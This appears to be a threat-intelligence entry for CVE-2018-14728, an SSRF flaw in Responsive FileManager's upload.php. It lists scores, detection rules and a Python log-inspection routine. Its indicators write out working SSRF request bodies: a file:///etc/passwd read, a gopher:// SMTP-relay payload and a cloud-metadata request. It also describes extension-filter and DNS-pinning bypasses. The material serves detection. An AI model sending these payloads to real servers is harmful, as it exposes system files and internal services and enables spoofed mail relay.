CVE-2018-14728
published 2018-08-03

CVE-2018-14728: upload.php in Responsive FileManager 9.13.1 allows SSRF via the url parameter.

Priority: P277 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 76.51% (99.5th percentile)

Affected

3 ranges
Vendor | Product | Version range | Fixed in
tecrail | responsive_filemanager | |
tecrail | responsive_filemanager | |
tecrail | responsive_filemanager | |

Detection & IOCs (extracted from sources)

path: /filemanager/upload.php
command: fldr=&url=file:///etc/passwd
command: fldr=&url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%[email protected]%3E%250d%250aRCPT%20TO%3A%[email protected]%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%[email protected]%3E%250d%250aTo%3A%20%[email protected]%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
command: fldr=&url=http://169.254.169.254/openstack
yara: regex: root:.*:0:0:
  • Monitor POST requests to /filemanager/upload.php containing a 'url' parameter with schemes such as file://, gopher://, or internal IP ranges (e.g., 169.254.169.254) in the request body, indicating SSRF exploitation attempts.
  • Detect SSRF bypass attempts where a .ico filename is appended to PATH_INFO of upload.php to circumvent file-extension blocking controls.
  • Watch for DNS pinning bypass attempts where an attacker-controlled hostname resolves to 0.0.0.0 to reach internal services via the url parameter of upload.php.
  • Alert on POST bodies to upload.php containing gopher:// scheme URLs targeting internal ports (e.g., port 25), which can be used to relay SMTP commands via SSRF.
  • Successful exploitation of CVE-2018-14728 may return /etc/passwd content in the HTTP response body; detect responses matching the pattern root:.*:0:0: from upload.php endpoints.
  • CVE-2018-14728 was incompletely fixed; CVE-2020-10212 covers bypass techniques (PATH_INFO .ico suffix and DNS pinning to 0.0.0.0) that still affect versions 9.13.4 and 9.14.0, so detections must account for both the original and bypass variants.
  • File-extension blocking in upload.php is bypassable via PATH_INFO manipulation (e.g., appending .ico), meaning extension-based WAF/IDS rules alone are insufficient to block SSRF payloads.
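
The detection notes above, combined into one log-inspection routine. This is an added example, not code from the page or from the Responsive FileManager project; the function names and the sample records are constructed for illustration. It does not resolve hostnames, so the DNS-based variant still needs resolution at the sensor.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Matches upload.php plus any trailing PATH_INFO segment (e.g. /upload.php/x.ico).
UPLOAD_RE = re.compile(r"/filemanager/upload\.php(?P<path_info>/[^?]*)?", re.I)
PASSWD_RE = re.compile(r"root:.*:0:0:")  # response pattern listed on the page

def inspect(method, path, body, response_body=""):
    """Return the reasons a request/response pair looks like SSRF via upload.php."""
    m = UPLOAD_RE.search(path)
    if method.upper() != "POST" or not m:
        return []
    reasons = []
    if (m.group("path_info") or "").lower().endswith(".ico"):
        reasons.append("path_info_ico_suffix")
    for raw in parse_qs(body, keep_blank_values=True).get("url", []):
        try:
            parts = urlsplit(raw.strip())
            host = parts.hostname or ""
        except ValueError:
            reasons.append("unparseable_url")
            continue
        scheme = parts.scheme.lower()
        if scheme not in ("http", "https"):
            reasons.append(f"scheme:{scheme or 'none'}")
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            continue  # a hostname, not an IP literal: not resolved here (assumption)
        if ip.is_loopback or ip.is_link_local or ip.is_private or ip.is_unspecified:
            reasons.append(f"internal_ip:{ip}")
    if PASSWD_RE.search(response_body):
        reasons.append("passwd_in_response")
    return reasons

# Constructed sample records: (method, path, request body, response body).
SAMPLES = [
    ("POST", "/filemanager/upload.php", "fldr=&url=file:///etc/passwd",
     "root:x:0:0:root:/root:/bin/bash"),
    ("POST", "/filemanager/upload.php", "fldr=&url=http://169.254.169.254/openstack", ""),
    ("POST", "/filemanager/upload.php/a.ico", "fldr=&url=http://0.0.0.0/", ""),
    ("POST", "/filemanager/upload.php", "fldr=&url=https://example.com/logo.png", ""),
]

def run_samples():
    return [inspect(*record) for record in SAMPLES]

if __name__ == "__main__":
    for record, hits in zip(SAMPLES, run_samples()):
        print(record[1], record[2], "->", hits or "clean")
```
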

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P